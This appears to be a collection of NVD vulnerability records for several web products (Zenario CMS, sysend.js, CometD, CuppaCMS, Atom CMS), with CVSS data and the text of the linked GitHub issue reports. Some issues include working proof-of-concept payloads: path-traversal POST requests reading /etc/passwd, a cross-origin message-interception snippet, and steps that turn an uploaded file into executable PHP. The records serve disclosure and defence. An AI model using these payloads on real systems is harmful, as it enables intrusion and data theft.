{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.0.54156:*:*:*:*:*:*:*", "matchCriteriaId": "9DF42985-A221-41A6-BEC8-DF816BE2A0F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-9.0-last-version" ]
**Summary** hi team, I found small XSS upload file to SVG. **Info** 1. Zenario CMS 9.0.54156 last version 2. FireFox 92.0.1 (64-bit) ![image](https://user-images.githubusercontent.com/28292732/135416702-9cef5987-4f27-4967-bcef-45b30a22c1e4.png) **Steps** 1. Login to account http://xxx.xxx.x.x/admin.php?cID=1&cType=html ![image](https://user-images.githubusercontent.com/28292732/135416959-5f3b485d-c293-4b95-8838-aac0d8fda5b6.png) 2. Choose **Users & Contacts** and create any user 3. Click Image >> Upload an image ![image](https://user-images.githubusercontent.com/28292732/135417558-41429f91-f5c3-43a9-9cb8-c553d4fe221a.png) 4. use burpsuite and capture request file a.svg ![image](https://user-images.githubusercontent.com/28292732/135418161-15061b8f-4bf7-436b-8b38-cc990bc19f11.png) 5. click to **image avatar** >> click right mouse >> Inspect Element (F12) >> found to link vlun svg ![image](https://user-images.githubusercontent.com/28292732/135419006-2786aa09-5d0e-40cf-8122-c721661d019b.png) 6. Copy domain >> open web >> **BOOM XSS** alert message ![image](https://user-images.githubusercontent.com/28292732/135419221-ba7a747e-d45f-4779-b3c0-ffdf001dc814.png) **Inpact** : Attacker can send malicious files to victims and steals victim's cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS.
XSS upload file to *.SVG in Zenario CMS 9.0.54156
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/1/comments
0
2021-09-30T08:49:15Z
2023-02-09T17:44:29Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/1
1,011,898,375
1
3,340
CVE-2021-42171
2022-03-14T15:15:09.327
Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/166617/Zenario-CMS-9.0.54156-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://minhnq22.medium.com/file-upload-to-rce-on-zenario-9-0-54156-cms-fa05fcc6cf74" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/166617/Zenario-CMS-9.0.54156-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://minhnq22.medium.com/file-upload-to-rce-on-zenario-9-0-54156-cms-fa05fcc6cf74" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tribalsystems:zenario:9.0.54156:*:*:*:*:*:*:*", "matchCriteriaId": "9DF42985-A221-41A6-BEC8-DF816BE2A0F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "hieuminhnv", "Zenario-CMS-9.0-last-version" ]
**Summary** hi team, I found high Upload file to RCE. **Info** Zenario CMS 9.0.54156 last version FireFox 92.0.1 (64-bit) ![image](https://user-images.githubusercontent.com/28292732/136005207-601d0a9f-96d2-4452-9888-c34cff3037ef.png) **Steps** 1. Login to account http://xxx.xxx.x.x/admin.php?cID=1&cType=html ![image](https://user-images.githubusercontent.com/28292732/136008927-8862b16d-b82d-4908-acd5-a0ca99c8e6fb.png) 2. Choose Documents >> Upload documents ![image](https://user-images.githubusercontent.com/28292732/136005989-2a33f63e-1696-4f4c-8ad8-a86e15d610da.png) 3. Use burpsuite and capture request file a.html ![image](https://user-images.githubusercontent.com/28292732/136006430-3fa0c163-d55c-4e36-837a-eb91dd22799b.png) 4. Click Edit document metadata >> use burpsuite to capture >> save ![image](https://user-images.githubusercontent.com/28292732/136006831-90b7d299-05df-4222-be42-fe182ea27323.png) 5. In value **current_value**, edit value **html** to **php** ![image](https://user-images.githubusercontent.com/28292732/136007658-424331cc-a312-4fe2-ac41-6cb49eec683c.png) 6. Click Actions >> view public link ![image](https://user-images.githubusercontent.com/28292732/136007988-11b1f140-9f8f-4355-b0f0-188f6ca0e00e.png) 7.Copy link to URL >> **BOOM** ![image](https://user-images.githubusercontent.com/28292732/136008068-3c579efa-af1b-4c11-a349-dd774db3dad5.png) Inpact : An attacker could upload a dangerous executable file like a virus, malware, etc.. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.
Upload file to RCE in Zenario CMS 9.0.54156
https://api.github.com/repos/hieuminhnv/Zenario-CMS-last-version/issues/2/comments
0
2021-10-05T10:49:07Z
2023-02-09T17:45:14Z
https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/2
1,016,172,365
2
3,341
CVE-2022-24762
2022-03-14T23:15:08.427
sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/commit/a24f4b776fb18191ae0f7e3d90c2c7bec459431a" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/issues/33" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/releases/tag/1.10.0" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/security/advisories/GHSA-4vvg-x86p-mvqc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/commit/a24f4b776fb18191ae0f7e3d90c2c7bec459431a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/issues/33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/releases/tag/1.10.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jcubic/sysend.js/security/advisories/GHSA-4vvg-x86p-mvqc" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sysend.js_project:sysend.js:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "A43EE609-11E5-4F09-852C-915CA49B4597", "versionEndExcluding": "1.10.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/jcubic/sysend.js/issues/33
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jcubic", "sysend.js" ]
If users use cross-domain communication, attackers can create an iframe and listen to any messages sent from the app and also send messages to the app. This happens only in the same browser so this is low impact. Example exploit, if you upload this file to any domain, you can intercept messages from http://jcubic.pl/sysend.php ```javascript sysend.proxy('http://jcubic.pl'); window.addEventListener('message', (e) => { console.log(e); }); ```
Leaking of potentially sensitive user information on Cross-Domain communication
https://api.github.com/repos/jcubic/sysend/issues/33/comments
0
2022-03-13T12:52:34Z
2022-03-13T13:21:33Z
https://github.com/jcubic/sysend/issues/33
1,167,571,997
33
3,342
CVE-2022-24721
2022-03-15T14:15:08.247
CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster-internal traffic that contains other users' (possibly sensitive) data. By publishing to those channels, a remote user may be able to create/modify/delete other user's data and modify the cluster structure. A fix is available in versions 5.0.11, 6.0.6, and 7.0.6. As a workaround, install a custom `SecurityPolicy` that forbids subscription and publishing to remote, non-Oort, sessions on Oort and Seti channels.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cometd/cometd/issues/1146" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cometd/cometd/security/advisories/GHSA-rjmq-6v55-4rjv" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cometd/cometd/issues/1146" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cometd/cometd/security/advisories/GHSA-rjmq-6v55-4rjv" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cometd:cometd:*:*:*:*:*:*:*:*", "matchCriteriaId": "C396054E-E663-49EF-8212-2D3BFACDCA0A", "versionEndExcluding": "5.0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:cometd:cometd:*:*:*:*:*:*:*:*", "matchCriteriaId": "431F0B99-7272-48BE-B046-65AEDF8AE02A", "versionEndExcluding": "6.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "6.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:cometd:cometd:*:*:*:*:*:*:*:*", "matchCriteriaId": "9864C8A4-84FC-4341-955F-508FDD7F876A", "versionEndExcluding": "7.0.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/cometd/cometd/issues/1146
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cometd", "cometd" ]
**CometD version(s)** 5.0.x **Description** Review usage of channels used by CometD (e.g. `Oort` and `Seti`).
Review Oort/Seti channel usage
https://api.github.com/repos/cometd/cometd/issues/1146/comments
0
2022-02-22T16:39:08Z
2022-02-25T09:26:35Z
https://github.com/cometd/cometd/issues/1146
1,147,132,252
1,146
3,343
CVE-2022-25485
2022-03-15T18:15:12.047
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/24
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Product version:cuppaCMS v1.0 [http://cuppacms.com/files/cuppa_cms.zip](http://cuppacms.com/files/cuppa_cms.zip) ## poc ``` POST /alerts/alertLightbox.php url=../../../../../../../../../../../etc/passwd ``` <img width="1268" alt="image" src="https://user-images.githubusercontent.com/38547290/154226358-354ef363-b211-483a-9863-2ede994fb79d.png"> ## analysis location:alerts/alertLightbox.php line 113 <img width="1324" alt="image" src="https://user-images.githubusercontent.com/38547290/154226643-bc455f45-c292-41c8-bbf7-5ec23147c88e.png"> ` <?php include $cuppa->getDocumentPath().@$cuppa->POST("url");` and $cuppa->POST ``` // post public function POST($string){ return $this->sanitizeString(@$_POST[$string]); } ``` go on ``` public function sanitizeString($string){ return htmlspecialchars(trim(@$string)); } ``` so the post url without any lfi protected filter ## Repair suggestions you can check url ,for example check if it has .. then refuse this request
Unauthorized local file inclusion (LFI) vulnerability exists via the url parameter in /alerts/alertLightbox.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/24/comments
1
2022-02-16T08:43:24Z
2022-02-16T11:37:28Z
https://github.com/CuppaCMS/CuppaCMS/issues/24
1,139,705,740
24
3,344
CVE-2022-25486
2022-03-15T18:15:12.230
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/25" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hansmach1ne/MyExploits/tree/main/Multiple_LFIs_in_CuppaCMS_alerts" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hansmach1ne/MyExploits/tree/main/Multiple_LFIs_in_CuppaCMS_alerts" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Greetings, I found a LFI vulnerability in CuppaCMS. How is disclosure process exactly done. Can you provide me an email where I can contact you with the details.
Multiple non authenticated local file inclusions found
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/15/comments
0
2022-01-04T14:09:43Z
2023-11-14T23:17:28Z
https://github.com/CuppaCMS/CuppaCMS/issues/15
1,093,392,205
15
3,345
CVE-2022-25486
2022-03-15T18:15:12.230
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/25" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hansmach1ne/MyExploits/tree/main/Multiple_LFIs_in_CuppaCMS_alerts" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hansmach1ne/MyExploits/tree/main/Multiple_LFIs_in_CuppaCMS_alerts" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/25
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
Product version:cuppaCMS v1.0 [http://cuppacms.com/files/cuppa_cms.zip](http://cuppacms.com/files/cuppa_cms.zip) ## poc ``` POST /alerts/alertConfigField.php urlConfig=../../../../../../../../../../../../../../etc/passwd ``` ![image](https://user-images.githubusercontent.com/38547290/154229228-9fd38bfd-af68-4231-961d-9ef10880556e.png) ## analysis location: /alerts/alertConfigField.php line 77 <img width="1393" alt="image" src="https://user-images.githubusercontent.com/38547290/154229347-e0521d71-4030-4dca-9227-a605f89558a1.png"> ` <?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>` and $cuppa->POST ``` // post public function POST($string){ return $this->sanitizeString(@$_POST[$string]); } ``` go on ``` public function sanitizeString($string){ return htmlspecialchars(trim(@$string)); } ``` so the post urlConfig without any lfi protected filter ## Repair suggestions you can check urlConfig ,for example check if it has .. then refuse this request
Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/25/comments
0
2022-02-16T08:54:20Z
2023-11-14T23:14:18Z
https://github.com/CuppaCMS/CuppaCMS/issues/25
1,139,719,083
25
3,346
CVE-2022-25487
2022-03-15T18:15:12.287
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
